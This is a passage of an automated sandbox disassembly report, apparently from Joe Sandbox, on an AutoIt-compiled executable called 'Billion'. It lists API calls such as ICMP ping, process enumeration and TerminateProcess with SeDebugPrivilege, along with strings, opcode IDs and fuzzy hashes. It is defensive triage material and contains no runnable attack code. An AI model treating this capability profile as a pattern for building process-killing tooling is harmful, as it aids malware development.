                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b747929d7794ac13fa22440387ced8906929a632cbd0166decb206aaa140ffa1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83C28771E00605DFCB24DF98C880BADB7B1FF19310F25816AE915AB2A1D775EE42CB91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001415F2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: t5 $t5 $t5 $t5 $t5 t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-678494459
                                                                                                                                                                                                                                                                                                          • Opcode ID: d7ae0aa0bd717eb5dbc0e758282f1e22c0b922a2dc788380502512c1f9c5042b
                                                                                                                                                                                                                                                                                                          • Instruction ID: a9e758a44cdd5919bfd2c04784868933bc5426d5678c50cb0426b423b6bb3ee4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7ae0aa0bd717eb5dbc0e758282f1e22c0b922a2dc788380502512c1f9c5042b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9B28C74A08300CFD729DF15C480A2AB7E1BF99304F25495DEA998B3A2D771ED85CF92

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 001B1019
                                                                                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 001B1079
                                                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 001B1085
                                                                                                                                                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 001B1093
                                                                                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001B1123
                                                                                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001B1142
                                                                                                                                                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 001B1216
                                                                                                                                                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 001B121C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                          • Opcode ID: 94cc2f29d44837d0bdb5eb018ecf7db57d16bd60c7738fa5a1c1463b04f75673
                                                                                                                                                                                                                                                                                                          • Instruction ID: 44e64181360f84b44ae5b48e15652326d39a865375011dba133d3ced3835bf57
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94cc2f29d44837d0bdb5eb018ecf7db57d16bd60c7738fa5a1c1463b04f75673
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F191B171604201AFD720DF29C899F56BBE0FF48318F5A85A9F5658B6A2C730ED85CB81

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001332AF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 001332B7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001332C2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001332CD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 001332D5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 001332DD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133205: RegisterWindowMessageW.USER32(00000004,?,00132964), ref: 0013325D
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00132A0A
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32 ref: 00132A28
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00173A0D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: (& $0$ $4' $d( $$
                                                                                                                                                                                                                                                                                                          • API String ID: 1986988660-1076921426
                                                                                                                                                                                                                                                                                                          • Opcode ID: d3830fd7ac0757729a35899abc90b26c128a0d42239fcb3cd8d1833fd3242699
                                                                                                                                                                                                                                                                                                          • Instruction ID: 70d91a970f92cb35b1c04999bfdd3f120846dde8787888ed3b9b30e6e7bd2252
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3830fd7ac0757729a35899abc90b26c128a0d42239fcb3cd8d1833fd3242699
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A7167B4911300CEC789EF69BEAD6157EE4FB68304790912BE018D72A3EB70854D8F68

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: ac4ab92022cfcff3b941e38bea505153df3a4b65bed80a84df46068a9a1bd97b
                                                                                                                                                                                                                                                                                                          • Instruction ID: a5a16568acc146ca14a662293d84f6f43169f2b3f02488052eb778dc45f5f4a4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac4ab92022cfcff3b941e38bea505153df3a4b65bed80a84df46068a9a1bd97b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC102B0A04349AFCF11DFA8DC45BADBBB8BF19310F144199E814AB3D2C7349962CB61

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0019DDAC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0019DDBA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: CloseHandle.KERNEL32(00000000), ref: 0019DE87
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BABCA
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001BABDD
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BAC10
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 001BACC5
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 001BACD0
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BAD21
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                          • Opcode ID: dfada2eee4ac867bc276633ada85b1198a51127374bb4f694012e0e50b545e5e
                                                                                                                                                                                                                                                                                                          • Instruction ID: a04bfb4070932fb1b3e5a48b519a9ccadd014da54c2de9666ea34d9a6aafa705
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfada2eee4ac867bc276633ada85b1198a51127374bb4f694012e0e50b545e5e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1961C1B0204641AFD720DF15C495F65BBE1AF54318F98849CF4668BBA3C771EC85CB92

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 2077 1335b3-133623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001335E1
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133602
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 00133616
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 0013361F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                          • Opcode ID: c28aacb0f17a5f585ec4b6034d02f528ba68f01130f166c06b5cf9e2fcf157a0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4ed184e5bc47a44c4fffed6553554e36b97fe493a2e6f9d6a20099f1ba7414fd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28aacb0f17a5f585ec4b6034d02f528ba68f01130f166c06b5cf9e2fcf157a0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0B771640394BAE72157177C0CE373EBDD7C6F54B00006FB904A7561D6695899DAB0

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00175287
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00136299
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0433511e224a36b3fea2d14fccc28491cf2fd61beaaa351a69e584b2f78a911b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6bd63186dc7f7d3e9f40d134b0144da9b55faee4a19b62c050dab1e44b8a4036
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0433511e224a36b3fea2d14fccc28491cf2fd61beaaa351a69e584b2f78a911b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241B671408304AAC714EB60EC49EDFB7ECAF65314F00862EF999920A2EF74D649C792
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 001358EF
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 00135910
                                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 00135932
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                          • Opcode ID: f30ce8ba0d5076932639c576081373a0e24f13821744c47417bc0a82167d7341
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a1d1632efe3049c50f7bcbe505f2d7d259943bed1a6a000490b6ddd9d67c86e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f30ce8ba0d5076932639c576081373a0e24f13821744c47417bc0a82167d7341
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF115AB5510618FFDB218FA8DC80EAEBBB9EF00B64F104469F801E7210E3319E519760
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0013F27B
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0013F289
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F29F
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0013F2B1
                                                                                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 001832D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3288985973-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a5190036c72aa160e2f49a663964af2fe552416a0b338257c1e5e69eba0db19
                                                                                                                                                                                                                                                                                                          • Instruction ID: f89c53b1c9ac0aac35a416360feb88c8db9ff04049c82b26c4d906adeed2f0fb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5190036c72aa160e2f49a663964af2fe552416a0b338257c1e5e69eba0db19
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F05E30604344DBEB749BA0DC89FAA77ADAB44714F104929E219930D0DB70D5888B25
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 001509D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00153614: RaiseException.KERNEL32(?,?,?,001509FA,?,00000000,?,?,?,?,?,?,001509FA,00000000,001F9758,00000000), ref: 00153674
                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 001509F5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                          • Opcode ID: b1887cd42fe1a3a65668d7bbbc9a70a4af581deb63b74204dde6762683531418
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5fc9e71ac74a9f06af9a0a99ac938a0f1ef50e06ccc32a9c37b986e2040a32a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1887cd42fe1a3a65668d7bbbc9a70a4af581deb63b74204dde6762683531418
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0223480060CF7CB06BAE4DC569AE776C5E28356B604125BD389F5A2FB30EA1DCAC0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001B8D52
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 001B8D59
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 001B8F3A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 32a58f1c3d8a5121b46be7967d1d83ecb1e3a1a3df9cb6f7b95616cfcf040653
                                                                                                                                                                                                                                                                                                          • Instruction ID: 092d3a55c435d566fe4285de114d2539fe59dfe6e401557e95c4c00a7d2e3861
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32a58f1c3d8a5121b46be7967d1d83ecb1e3a1a3df9cb6f7b95616cfcf040653
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C127C719083019FD714DF28C484BAABBE5FF98718F14895DF8898B392DB30E945CB92
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92d90bcf94012c78c5fda50763fd96a826d2057750196513b7a4ea908e99ac87
                                                                                                                                                                                                                                                                                                          • Instruction ID: cf4161e5c7cb99c7e8b04ac7206a91b2c8bfd572b2881c3fcd1c91e6e1733f7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92d90bcf94012c78c5fda50763fd96a826d2057750196513b7a4ea908e99ac87
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34A17B31604605EFCB18DF58C5D19A9BBF1FF59314B2084ADE95A8F2A2DB31ED46CB80
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00136299
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0014FD36
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0014FD45
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0018FE33
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f8b94fb9cb0d17850de30ae1abb58a6fd1b4faa91e3fa311a162e902206f979
                                                                                                                                                                                                                                                                                                          • Instruction ID: f435c6f3d949e37aa09a32c9faec83c68a46f0c2ee988154160506ade35345d6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f8b94fb9cb0d17850de30ae1abb58a6fd1b4faa91e3fa311a162e902206f979
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08319571904744AFEB32DF64D859BE7BBECAB12308F0044AEE69957242C3745A86CF51
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0016894C,?,001F9CE8,0000000C), ref: 00168A84
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0016894C,?,001F9CE8,0000000C), ref: 00168A8E
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00168AB9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 53b73adf378357322177db1bc44d870857553bda0e73c6c9a2dce47fbd308a8f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 89d2f89b4b3fad25e178471cbdd105a897bbfaa07100bcab034f0c64bb11bbca
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53b73adf378357322177db1bc44d870857553bda0e73c6c9a2dce47fbd308a8f
